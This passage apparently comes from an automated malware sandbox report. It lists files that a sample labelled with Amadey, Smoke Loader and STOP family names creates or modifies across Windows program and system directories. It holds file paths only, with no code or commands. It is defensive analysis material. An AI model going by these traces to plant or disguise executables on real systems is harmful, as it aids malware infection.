File created C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\chrmstp.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_4.0.2.0_x64__8wekyb3d8bbwe\StickyNotesStub.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\dotnet.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\msoev.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\PPTICO.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Windows Media Player\wmlaunch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdateSetup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_pwa_launcher.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jar.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\rmid.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Mozilla Firefox\private_browsing.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\MicrosoftEdgeUpdate.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\ShapeCollector.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\jjs.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\visicon.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\notification_click_helper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeCore\132.0.2957.140\msedge.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Windows Media Player\wmlaunch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\xjc.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\extcheck.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.46.11001.0_x64__8wekyb3d8bbwe\GameBar.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\Installer\setup.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\msedge_proxy.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Program Files (x86)\Windows Media Player\wmplayer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..screencontentserver_31bf3856ad364e35_10.0.22000.1_none_5d8b0964af4f5e05\LockScreenContentServer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-com-dtc-tracing_31bf3856ad364e35_10.0.22000.1_none_6e22e868f79867b0\msdtcvtr.bat_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-ie-setup-support_31bf3856ad364e35_11.0.22000.348_none_04e0603a0d245e07\ie4uinit.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-update-usoclient_31bf3856ad364e35_10.0.22000.469_none_aa2bb1f81a06280c\r\UsoClient.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-winrsplugins_31bf3856ad364e35_10.0.22000.1_none_6c7a140d3670631f\winrs.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-msaudittools_31bf3856ad364e35_10.0.22000.1_none_781d59aef5ebc75f\auditpol.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-quickassist_31bf3856ad364e35_10.0.22000.282_none_f927204bf41f3d61\f\quickassist.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..nagement-appvclient_31bf3856ad364e35_10.0.22000.376_none_c7a79de54d7799ec\f\SyncAppvPublishingServer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-e..-mdmdiagnosticstool_31bf3856ad364e35_10.0.22000.1_none_b5447a0b77a5213f\MdmDiagnosticsTool.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.22000.120_none_64d060998298410d\r\FileExplorer.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_openssh-common-components-onecore_31bf3856ad364e35_10.0.22000.1_none_12ea1a72b4886bec\scp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-displayswitch_31bf3856ad364e35_10.0.22000.1_none_43054e9f294487ea\DisplaySwitch.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-d..-japanese-utilities_31bf3856ad364e35_10.0.22000.1_none_4dc986ddab447f27\IMJPUEX.EXE_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_aspnet_regbrowsers_b03f5f7f11d50a3a_10.0.22000.1_none_a631d85ed7b16283\aspnet_regbrowsers.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..perience-ait-static_31bf3856ad364e35_10.0.22000.1_none_872834aeb30e11cf\aitstatic.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-s..or-native-serverbox_31bf3856ad364e35_10.0.22000.120_none_6b23f06ce93f4f52\f\RMActivate_ssp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-setup-component_31bf3856ad364e35_10.0.22000.376_none_2d61a5193292e66c\r\audit.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_netfx4-aspnet_wp_exe_b03f5f7f11d50a3a_4.0.15806.256_none_4e9ea93e588a5995\aspnet_wp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-wifinetworkmanager_31bf3856ad364e35_10.0.22000.37_none_4ebd7bd997a97fcb\r\wifitask.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-sharedfoldersui_31bf3856ad364e35_10.0.22000.1_none_18b57cd06ab48849\shrpubw.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_networking-mpssvc-netsh_31bf3856ad364e35_10.0.22000.434_none_b4a3a74a80427a96\r\CheckNetIsolation.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-aarsvc_31bf3856ad364e35_10.0.22000.1_none_b9334c2faa2133a2\agentactivationruntimestarter.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.282_none_6b2d7072c225a87c\r\WerFault.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-gdi_31bf3856ad364e35_10.0.22000.132_none_a52f79fedfba2bb3\fontdrvhost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-smss-minwin_31bf3856ad364e35_10.0.22000.1_none_d4a473e8ed9480cf\smss.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-x..jectdialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_f698302c22284569\r\XGpuEjectDialog.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-security-spp-extcom_31bf3856ad364e35_10.0.22000.318_none_065139dac533d14e\f\SppExtComObj.Exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.22000.318_none_2bc95a47eaa37094\hvax64.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-a..roblemstepsrecorder_31bf3856ad364e35_10.0.22000.1_none_3b89d92484239859\psr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\r\Taskmgr.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-s..cecontroller-minwin_31bf3856ad364e35_10.0.22000.51_none_2158495b1874d95c\f\services.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_microsoft-windows-advancedtaskmanager_31bf3856ad364e35_10.0.22000.65_none_9b4fcb543bd21a13\f\Taskmgr.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-onecore-pnp-drvinst_31bf3856ad364e35_10.0.22000.1_none_aba17b366eb3e321\drvinst.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-a..t-bytecodegenerator_31bf3856ad364e35_10.0.22000.71_none_c26272ecb066f6ab\ByteCodeGenerator.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-b..ment-windows-minwin_31bf3856ad364e35_10.0.22000.318_none_4b63ad41811cb76d\f\winload.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsdiag_31bf3856ad364e35_10.0.22000.434_none_478d6c55833b17ab\dcdiag.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-narrator_31bf3856ad364e35_10.0.22000.100_none_b998a9a728d6401f\f\Narrator.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.22000.1_none_03f10908532480fe\PickerHost.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\f\PinningConfirmationDialog.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..auncher-cmdlinetool_31bf3856ad364e35_10.0.22000.1_none_4d8388bf67ce9090\pwlauncher.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tiondialog.appxmain_31bf3856ad364e35_10.0.22000.120_none_0f681b8c9b834caa\PinningConfirmationDialog.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\msil_addinprocess_b77a5c561934e089_10.0.22000.1_none_f1c351dedf09f213\AddInProcess.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-wmi-core-svc_31bf3856ad364e35_10.0.22000.1_none_014b03c8301af3f9\WinMgmt.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\wow64_windowssearchengine_31bf3856ad364e35_7.0.22000.348_none_5f6e7d4cbd14f8f7\f\SearchIndexer.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-deviceenroller_31bf3856ad364e35_10.0.22000.469_none_bc884b259290e3bf\r\DeviceEnroller.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.22000.120_none_dd24c7cd1fc6d4b1\PeopleExperienceHost.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_windows-securityhealth-sso_31bf3856ad364e35_10.0.22000.100_none_bac6834bfb16b20d\r\SecurityHealthSystray.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\wow64_microsoft-windows-remoteassistance-exe_31bf3856ad364e35_10.0.22000.120_none_3d11f25cbb74100a\sdchange.exe- C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-atbroker_31bf3856ad364e35_10.0.22000.1_none_25e44d77231e4b64\AtBroker.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\amd64_microsoft-windows-d..-commandline-dsmgmt_31bf3856ad364e35_10.0.22000.434_none_4634d5a384238dfd\r\dsmgmt.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
File created C:\Windows\WinSxS\x86_microsoft-windows-ie-feedsbs_31bf3856ad364e35_11.0.22000.1_none_2a646c04920783d6\msfeedssync.exe_ C:\Users\Admin\AppData\Local\Temp\2025-07-04_427915f92d6dfee464abcbe95899af89_amadey_blackenergy_elex_smoke-loader_stop.exe N/A
